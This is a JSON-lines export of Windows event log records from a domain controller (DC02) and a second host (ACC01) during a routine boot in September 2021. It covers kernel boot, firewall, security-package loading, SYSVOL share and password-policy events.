{"EventTime":"2021-09-21T13:02:52.604319+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":153,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":0,"TaskValue":62,"OpcodeValue":0,"RecordNumber":169965,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Virtualization-based security (policies: 0) is disabled.","Opcode":"Info","Status":"0","EnableDisableReason":"0","VsmPolicy":"0","EventReceivedTime":"2021-09-21T13:03:49.020278+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:52.604389+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":20,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":1,"TaskValue":31,"OpcodeValue":0,"RecordNumber":169966,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The last shutdown's success status was true. The last boot's success status was true.","Opcode":"Info","LastShutdownGood":"true","LastBootGood":"true","LastBootId":"31","BootStatusPolicy":"2","EventReceivedTime":"2021-09-21T13:03:49.020278+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:26.712421+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":32,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":727,"ExecutionProcessID":940,"ExecutionThreadID":956,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Plugin RDSAppXPlugin has been successfully initialized","Opcode":"Info","EventXML.messageName":"RDSAppXPlugin","EventReceivedTime":"2021-09-21T13:03:48.637987+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.493342+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":20523,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":302,"ActivityID":"{F4624863-5010-4535-90FF-056E4EC70000}","ExecutionProcessID":344,"ExecutionThreadID":1100,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Connection from listener RDP-Tcp will have terminal class of {5828227c-20cf-4408-b73f-73ab70b8849f}","Opcode":"Info","EventXML.ListenerName":"RDP-Tcp","EventXML.Class":"{5828227c-20cf-4408-b73f-73ab70b8849f}","EventReceivedTime":"2021-09-21T13:03:49.761640+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.172661+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6005,"SourceName":"EventLog","TaskValue":0,"RecordNumber":169956,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The Event log service was started.","EventData.Binary":"E507090002001500070012001C00AC000000000000000000","EventReceivedTime":"2021-09-21T13:03:48.808556+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:52.604446+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":27,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":1,"TaskValue":33,"OpcodeValue":0,"RecordNumber":169968,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The boot type was 0x0.","Opcode":"Info","BootType":"0","LoadOptions":" NOEXECUTE=OPTOUT","EventReceivedTime":"2021-09-21T13:03:49.051054+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:52.604493+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":18,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":0,"TaskValue":57,"OpcodeValue":0,"RecordNumber":169969,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"There are 0x1 boot options on this system.","Opcode":"Info","EntryCount":"1","EventReceivedTime":"2021-09-21T13:03:49.051054+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:00:23.449471+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":6008,"SourceName":"EventLog","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56098,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The previous system shutdown at 8:17:56 PM on ???9/???16/???2021 was unexpected.","Data":"8:17:56 PM","Data_1":"???9/???16/???2021","Data_2":"6060001","EventData.Binary":"E5070900040010001400110038000902E5070900040010000E00200038000902600900003C000000010000006009000001000000B00400000000000000000000","EventReceivedTime":"2021-09-21T13:03:39.653409+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:49.964759+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":781,"SourceName":"Microsoft-Windows-Complus","ProviderGuid":"{0F177893-4A9C-4709-B921-F432D67F43D5}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109824,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The COM+ sub system is suppressing duplicate event log entries for a duration of 86400 seconds.  The suppression timeout can be controlled by a REG_DWORD value named SuppressDuplicateDuration under the following registry key: HKLM\\Software\\Microsoft\\COM3\\Eventlog.","param1":"86400","param2":"SuppressDuplicateDuration","param3":"Software\\Microsoft\\COM3\\Eventlog","EventReceivedTime":"2021-09-21T13:03:52.917882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:30.975261+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5615,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109815,"ExecutionProcessID":2032,"ExecutionThreadID":1464,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Management Instrumentation Service started sucessfully","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.261633+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:53.355385+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4202,"SourceName":"Microsoft-Windows-MSDTC 2","ProviderGuid":"{5D9E0020-3761-4F36-90C8-38CE6511BD12}","Version":0,"TaskValue":2,"OpcodeValue":0,"RecordNumber":109827,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"MSDTC started with the following settings:\r\r Security Configuration (OFF = 0 and ON = 1):\r Allow Remote Administrator = 0,\r Network Clients = 0,\r Transaction Manager Communication: \r Allow Inbound Transactions = 0,\r Allow Outbound Transactions = 0,\r Transaction Internet Protocol (TIP) = 0,\r  Enable XA Transactions = 0,\r  Enable SNA LU 6.2 Transactions = 1,\r  MSDTC Communications Security = Mutual Authentication Required,\r Account = NT AUTHORITY\\NetworkService,\r  Firewall Exclusion Detected = 0\r\r Transaction Bridge Installed = 0\r Filtering Duplicate Events = 1\r","Category":"TM","param1":"0","param2":"0","param3":"0","param4":"0","param5":"0","param6":"0","param7":"1","param8":"Mutual Authentication Required","param9":"NT AUTHORITY\\NetworkService","param10":"0","param11":"0","param12":"1","EventReceivedTime":"2021-09-21T13:03:54.388872+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:40.872162+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":642,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153449,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Catalog Database (1348,D,12) Catalog Database: The database format feature version 9080 (0x2378) could not be used due to the current database format 1568.20.0, controlled by the parameter 0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat).","Category":"General","Opcode":"Info","Data":"Catalog Database","Data_1":"1348,D,12","Data_2":"Catalog Database: ","Data_3":"0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat)","Data_4":"9080 (0x2378)","Data_5":"1568.20.0","EventReceivedTime":"2021-09-21T13:03:41.028406+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.172661+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6009,"SourceName":"EventLog","TaskValue":0,"RecordNumber":169955,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Microsoft (R) Windows (R) 10.00. 17763  Multiprocessor Free.","Data":"10.00.","Data_1":"17763","Data_2":"Multiprocessor Free","Data_3":"0","EventReceivedTime":"2021-09-21T13:03:48.808556+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:32.198233+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1136,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":304,"ExecutionProcessID":2412,"ExecutionThreadID":2440,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"RD Session Host Server role is not installed.","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.292887+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:29.248944+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1531,"SourceName":"Microsoft-Windows-User Profiles Service","ProviderGuid":"{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109814,"ExecutionProcessID":1548,"ExecutionThreadID":1640,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The User Profile Service has started successfully.  \r\n\r\n","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.089757+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:58.998639+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775810","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":98,"SourceName":"Microsoft-Windows-Ntfs","ProviderGuid":"{3FF37A1C-A68D-4D6E-8C9B-F79E8B16C482}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169981,"ExecutionProcessID":4,"ExecutionThreadID":224,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Volume \\\\?\\Volume{7697e2b0-0000-0000-0000-100000000000} (\\Device\\HarddiskVolume1) is healthy.  No action is needed.","Opcode":"Info","DriveName":"\\\\?\\Volume{7697e2b0-0000-0000-0000-100000000000}","DeviceName":"\\Device\\HarddiskVolume1","CorruptionActionState":"0","EventReceivedTime":"2021-09-21T13:03:49.464754+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.210183+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854776836","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":172,"SourceName":"Microsoft-Windows-Kernel-Power","ProviderGuid":"{331C3B3A-2005-44C2-AC5E-77220C37D6B4}","Version":0,"TaskValue":203,"OpcodeValue":0,"RecordNumber":169982,"ExecutionProcessID":4,"ExecutionThreadID":180,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Connectivity state in standby: Disconnected, Reason: NIC compliance","Opcode":"Info","State":"2","Reason":"6","EventReceivedTime":"2021-09-21T13:03:49.496008+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:25.043988+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16977,"SourceName":"Microsoft-Windows-Directory-Services-SAM","ProviderGuid":"{0D4FDC09-8C27-494A-BDA0-505E4FD8ADAE}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169994,"ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The domain is configured with the following minimum password length-related settings.\r\n\r\nMinimumPasswordLength: 8\r\n\r\nMinimumPasswordLengthAudit: -1\r\n\r\nFor more information see https://go.microsoft.com/fwlink/?LinkId=2097191.\r\n","Opcode":"Info","EventData.Name":"SAMMSG_MINPWDLEN_SETTINGS_IN_EFFECT","MinimumPasswordLength":"8","MinimumPasswordLengthAudit":"-1","EventReceivedTime":"2021-09-21T13:03:49.621007+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:15.980218+05:45","Hostname":"DC02.prod.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":14,"SourceName":"Microsoft-Windows-Wininit","ProviderGuid":"{206F6DEA-D3C5-4D10-BC72-989F03C8B84B}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169991,"ExecutionProcessID":488,"ExecutionThreadID":492,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Credential Guard configuration: 0x0, 0","Opcode":"Info","Config":"0","IsTestConfig":"0","EventReceivedTime":"2021-09-21T13:03:49.574981+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:00:26.558866+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4620693217682128896","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1101,"SourceName":"Microsoft-Windows-Eventlog","ProviderGuid":"{FC65DDD8-D6EF-4962-83D5-6E5CFE9CE148}","Version":0,"TaskValue":101,"OpcodeValue":0,"RecordNumber":876429,"ExecutionProcessID":1220,"ExecutionThreadID":2180,"Channel":"Security","Message":"Audit events have been dropped by the transport.  0","Category":"Event processing","Opcode":"Info","AuditEventsDropped.Reason":"0","EventReceivedTime":"2021-09-21T13:03:42.309665+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:18.011839+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4622,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":3555523,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"A security package has been loaded by the Local Security Authority.\r\n\r\nSecurity Package Name:\tC:\\Windows\\system32\\msv1_0.DLL : NTLM","Category":"Security System Extension","Opcode":"Info","SecurityPackageName":"C:\\Windows\\system32\\msv1_0.DLL : NTLM","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.056710+05:45","Hostname":"DC02.prod.corp.local","Keywords":"2305843009213693952","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":50103,"SourceName":"Microsoft-Windows-Dhcp-Client","ProviderGuid":"{15A7A4F8-0072-4EAB-ABAD-F98A4D666AED}","Version":0,"TaskValue":4,"OpcodeValue":129,"RecordNumber":170011,"ExecutionProcessID":1144,"ExecutionThreadID":1200,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"DHCPv4 client registered for shutdown notification","Category":"Service State Event","Opcode":"ServiceShutdown","EventReceivedTime":"2021-09-21T13:03:49.732832+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:25.043440+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4614,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":3555538,"ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"A notification package has been loaded by the Security Account Manager.\r\nThis package will be notified of any account or password changes.\r\n\r\nNotification Package Name:\tscecli","Category":"Security System Extension","Opcode":"Info","NotificationPackageName":"scecli","EventReceivedTime":"2021-09-21T13:03:48.261636+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.250851+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4826,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13573,"OpcodeValue":0,"RecordNumber":3555506,"ExecutionProcessID":4,"ExecutionThreadID":32,"Channel":"Security","Message":"Boot Configuration Data loaded.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGeneral Settings:\r\n\tLoad Options:\t\t-\r\n\tAdvanced Options:\t\tNo\r\n\tConfiguration Access Policy:\tDefault\r\n\tSystem Event Logging:\tNo\r\n\tKernel Debugging:\tNo\r\n\tVSM Launch Type:\tOff\r\n\r\nSignature Settings:\r\n\tTest Signing:\t\tNo\r\n\tFlight Signing:\t\tNo\r\n\tDisable Integrity Checks:\tNo\r\n\r\nHyperVisor Settings:\r\n\tHyperVisor Load Options:\t-\r\n\tHyperVisor Launch Type:\tOff\r\n\tHyperVisor Debugging:\tNo","Category":"Other Policy Change Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x3e7","LoadOptions":"-","AdvancedOptions":"%%1843","ConfigAccessPolicy":"%%1846","RemoteEventLogging":"%%1843","KernelDebug":"%%1843","VsmLaunchType":"%%1848","TestSigning":"%%1843","FlightSigning":"%%1843","DisableIntegrityChecks":"%%1843","HypervisorLoadOptions":"-","HypervisorLaunchType":"%%1848","HypervisorDebug":"%%1843","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:18.888156+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4610,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":3555530,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"An authentication package has been loaded by the Local Security Authority.\r\nThis authentication package will be used to authenticate logon attempts.\r\n\r\nAuthentication Package Name:\tC:\\Windows\\system32\\msv1_0.DLL : MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","Category":"Security System Extension","Opcode":"Info","AuthenticationPackageName":"C:\\Windows\\system32\\msv1_0.DLL : MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:30.943181+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5033,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":3555681,"ExecutionProcessID":4,"ExecutionThreadID":312,"Channel":"Security","Message":"The Windows Firewall Driver started successfully.","Category":"Other System Events","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.250479+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:35.806111+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5142,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12808,"OpcodeValue":0,"RecordNumber":3555964,"ExecutionProcessID":4,"ExecutionThreadID":184,"Channel":"Security","Message":"A network share object was added.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC02$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nShare Information:\t\r\n\tShare Name:\t\t\\\\*\\SYSVOL\r\n\tShare Path:\t\tC:\\Windows\\SYSVOL\\sysvol","Category":"File Share","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC02$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","ShareName":"\\\\*\\SYSVOL","ShareLocalPath":"C:\\Windows\\SYSVOL\\sysvol","EventReceivedTime":"2021-09-21T13:03:50.542886+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:32.821602+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4953,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":3555707,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":8,"Channel":"Security","Message":"Windows Firewall ignored a rule because it could not be parsed.\r\n\t\r\nProfile:\tAll\r\n\r\nReason for Rejection:\tAn error occurred.\r\n\r\nRule:\r\n\tID:\tWMPNetworkSvc-2\r\n\tName:\t-","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","Profile":"All","ReasonForRejection":"An error occurred.","RuleId":"WMPNetworkSvc-2","RuleName":"-","EventReceivedTime":"2021-09-21T13:03:50.324138+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:51.917886+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7026,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170080,"ExecutionProcessID":608,"ExecutionThreadID":612,"Channel":"System","Message":"The following boot-start or system-start driver(s) did not load: \r\ndam","param1":"\ndam","EventReceivedTime":"2021-09-21T13:03:53.285783+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.592834+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4945,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":876637,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":728,"Channel":"Security","Message":"A rule was listed when the Windows Firewall started.\r\n\t\r\nProfile used:\tPublic\r\n\r\nRule:\r\n\tRule ID:\tCoreNet-ICMP6-PP-Out\r\n\tRule Name:\tCore Networking - Parameter Problem (ICMPv6-Out)","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileUsed":"Public","RuleId":"CoreNet-ICMP6-PP-Out","RuleName":"Core Networking - Parameter Problem (ICMPv6-Out)","EventReceivedTime":"2021-09-21T13:03:42.684658+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.773523+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":55,"SourceName":"Microsoft-Windows-Kernel-Processor-Power","ProviderGuid":"{0F67E49F-FE51-4E9F-B490-6F2948CC6027}","Version":0,"TaskValue":47,"OpcodeValue":0,"RecordNumber":169984,"ExecutionProcessID":4,"ExecutionThreadID":256,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Processor 1 in group 0 exposes the following power management capabilities:\r\n\r\nIdle state type: ACPI Idle (C) States (1 state(s))\r\n\r\nPerformance state type: ACPI Performance (P) / Throttle (T) States\r\nNominal Frequency (MHz): 2100\r\nMaximum performance percentage: 100\r\nMinimum performance percentage: 100\r\nMinimum throttle percentage: 12","Opcode":"Info","Group":"0","Number":"1","IdleStateCount":"1","IdleImplementation":"1","NominalFrequency":"2100","MaximumPerformancePercent":"100","MinimumPerformancePercent":"100","MinimumThrottlePercent":"12","PerformanceImplementation":"1","EventReceivedTime":"2021-09-21T13:03:49.527256+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:19.461888+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16962,"SourceName":"Microsoft-Windows-Directory-Services-SAM","ProviderGuid":"{0D4FDC09-8C27-494A-BDA0-505E4FD8ADAE}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169992,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote calls to the SAM database are being restricted using the default security descriptor: .\r\nFor more information please see http://go.microsoft.com/fwlink/?LinkId=787651.","Opcode":"Info","EventData.Name":"SAMMSG_RESTRICT_REMOTE_SAM_DEFAULT_SD","EventReceivedTime":"2021-09-21T13:03:49.621007+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
